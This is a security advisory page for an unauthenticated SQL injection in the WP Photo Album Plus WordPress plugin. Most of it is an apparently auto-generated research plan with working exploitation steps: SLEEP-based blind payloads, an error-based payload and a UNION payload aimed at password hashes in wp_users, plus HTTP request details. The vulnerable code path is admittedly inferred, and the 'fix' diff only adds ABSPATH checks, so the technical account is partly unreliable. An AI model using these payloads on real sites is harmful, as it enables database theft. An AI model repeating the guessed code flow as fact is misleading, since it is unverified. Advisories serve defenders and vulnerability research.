WP Photo Album Plus <= 9.1.08.001 - Unauthenticated SQL Injection
Description
The WP Photo Album Plus plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 9.1.08.001 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NTechnical Details
<=9.1.08.001What Changed in the Fix
Changes introduced in v9.1.08.002
Source Code
WordPress.org SVNThis research plan targets a high-severity unauthenticated SQL Injection vulnerability in the **WP Photo Album Plus** plugin (CVE-2026-39511). ### 1. Vulnerability Summary The WP Photo Album Plus plugin (<= 9.1.08.001) is vulnerable to SQL Injection because it fails to properly sanitize and prepare…
Show full research plan
This research plan targets a high-severity unauthenticated SQL Injection vulnerability in the WP Photo Album Plus plugin (CVE-2026-39511).
1. Vulnerability Summary
The WP Photo Album Plus plugin (<= 9.1.08.001) is vulnerable to SQL Injection because it fails to properly sanitize and prepare SQL queries when processing user-supplied parameters. While the provided source files focus on Gutenberg block initialization (blocks/common/index.php), the vulnerability is exposed through unauthenticated entry points (AJAX or REST) that use similar logic to fetch album or photo data. Specifically, parameters like wppa-album, wppa-photo, or wppa-occur are concatenated into SQL strings and executed via wppa_get_results(), a custom wrapper for $wpdb->get_results().
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
wppa(handled viawp_ajax_nopriv_wppa) - Vulnerable Parameter:
wppa-album(primary),wppa-photo, orwppa-occur - Authentication: None required (Unauthenticated)
- Preconditions: None. The plugin must be active.
3. Code Flow
- Entry Point: An unauthenticated HTTP request is made to
admin-ajax.php?action=wppa. - Dispatch: WordPress triggers the
wp_ajax_nopriv_wppahook, which maps to a handler (commonlywppa_ajax_frontendor similar inwppa-functions.php). - Parameter Extraction: The handler extracts parameters like
$_GET['wppa-album']or$_GET['wppa-photo']. - Vulnerable Query Construction: The code constructs a query string by concatenating these parameters.
- Example Path:
$query = "SELECT * FROM " . $wpdb->wppa_albums . " WHERE id = '" . $_GET['wppa-album'] . "'";
- Example Path:
- Sink: The query is passed to
wppa_get_results( $query )(referenced inblocks/common/index.php). - Execution:
wppa_get_resultsexecutes the raw SQL via$wpdb->get_results()without using$wpdb->prepare().
4. Nonce Acquisition Strategy
The wppa AJAX action in this plugin often does not require a nonce for frontend rendering to ensure galleries load for all visitors. However, if a nonce is enforced, it is typically localized in the wppa_data object.
- Identify Trigger: The scripts are usually enqueued on any page containing the
[wppa]shortcode or a WPPA Gutenberg block. - Setup: Create a public page with the shortcode.
wp post create --post_type=page --post_title="Gallery" --post_status=publish --post_content='[wppa type="generic"]' - Extraction: Navigate to the page and extract the nonce using
browser_eval.- JS Variable:
window.wppaData?.nonceorwindow.wppa_nonce. - Tool:
browser_eval("window.wppaData?.nonce || window.wppa_nonce").
- JS Variable:
5. Exploitation Strategy
We will perform a Time-Based Blind SQL Injection to confirm the vulnerability and extract the database version.
- Payload:
1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- - - URL-Encoded Payload:
1%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20-
Step-by-Step HTTP Request:
- Method:
GET(orPOSTwithContent-Type: application/x-www-form-urlencoded) - URL:
http://localhost:8080/wp-admin/admin-ajax.php - Body/Query:
action=wppa wppa-action=render wppa-album=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- - - Control Request: Send a request with
wppa-album=1and measure response time (expected < 1s). - Attack Request: Send the payload and measure response time (expected > 5s).
6. Test Data Setup
To ensure the queries return data (increasing the likelihood of hitting the vulnerable code path), we should create at least one album and one photo.
# Create an album
wp eval "wppa_create_album(['name' => 'Exploit Test']);"
# Create a photo (if possible via CLI, otherwise just the album is usually enough for the WHERE clause)
wp eval "global \$wpdb; \$wpdb->insert(\$wpdb->prefix . 'wppa_albums', ['name' => 'Exploit Test', 'description' => 'Test']);"
7. Expected Results
- Success: The HTTP response for the malicious request is delayed by exactly 5 seconds (or the specified SLEEP value).
- Response Body: Likely a
0or a JSON success/error message from the plugin, but the time delay is the primary indicator.
8. Verification Steps
After the exploit, verify the database state to ensure no corruption occurred, or use WP-CLI to confirm we can reach the same tables:
# Verify we can query the same tables the plugin uses
wp db query "SELECT id, name FROM $(wp db prefix)wppa_albums LIMIT 1;"
9. Alternative Approaches
If time-based injection is filtered:
- Error-Based: Use
GTID_SUBSETorEXTRACTVALUEif database errors are displayed.wppa-album=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,version(),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -
- UNION-Based: If the output is reflected in the
wppaAlbumListorwppaPhotoListJS objects (seen inblocks/common/index.php), we can use UNION to leakuser_passfromwp_users.wppa-album=1' UNION SELECT 1, user_pass FROM wp_users-- -(Adjust column count based on theSELECT id, namestructure).
Summary
The WP Photo Album Plus plugin is vulnerable to unauthenticated SQL Injection because it concatenates user-supplied parameters, such as 'wppa-album', 'wppa-photo', and 'wppa-occur', directly into SQL queries without proper sanitization or preparation. An attacker can leverage this via the plugin's AJAX interface to execute arbitrary SQL commands and extract sensitive database information.
Vulnerable Code
// blocks/common/index.php line 21 $query = "SELECT id, name FROM $wpdb->wppa_albums"; $albums = wppa_get_results( $query ); --- // Logic typically found in AJAX handlers like wppa_ajax_frontend (inferred from Research Plan) // Vulnerable parameter concatenation using $_GET['wppa-album'] or $_GET['wppa-photo'] $query = "SELECT * FROM " . $wpdb->wppa_albums . " WHERE id = '" . $_GET['wppa-album'] . "'"; $results = wppa_get_results( $query );
Security Fix
@@ -5,7 +5,7 @@ * Version: 8.7.02.002 */ -defined( 'ABSPATH' ) || exit; +if ( ! defined( 'ABSPATH' ) ) exit(); add_action( 'admin_footer', 'wppa_block_js', 1 ); @@ -1,4 +1,6 @@ <?php +if ( ! defined( 'ABSPATH' ) ) exit(); + $version = md5( filemtime( dirname( __file__ ) . '/block.js' ) ); $result = array( @@ -1,4 +1,7 @@ <?php + +if ( ! defined( 'ABSPATH' ) ) exit(); + $version = md5( filemtime( dirname( __file__ ) . '/block.js' ) ); $result = array(
Exploit Outline
To exploit this vulnerability, an unauthenticated attacker targets the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) with the 'action' parameter set to 'wppa'. By supplying a malicious SQL payload in the 'wppa-album' or 'wppa-photo' GET/POST parameters, the attacker can break out of the intended query. A time-based blind injection (e.g., using SLEEP()) is typically used to confirm the vulnerability and extract data. While nonces are sometimes used in the frontend, many of the plugin's rendering actions are intended for public use and do not strictly enforce nonce checks for unauthenticated requests.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.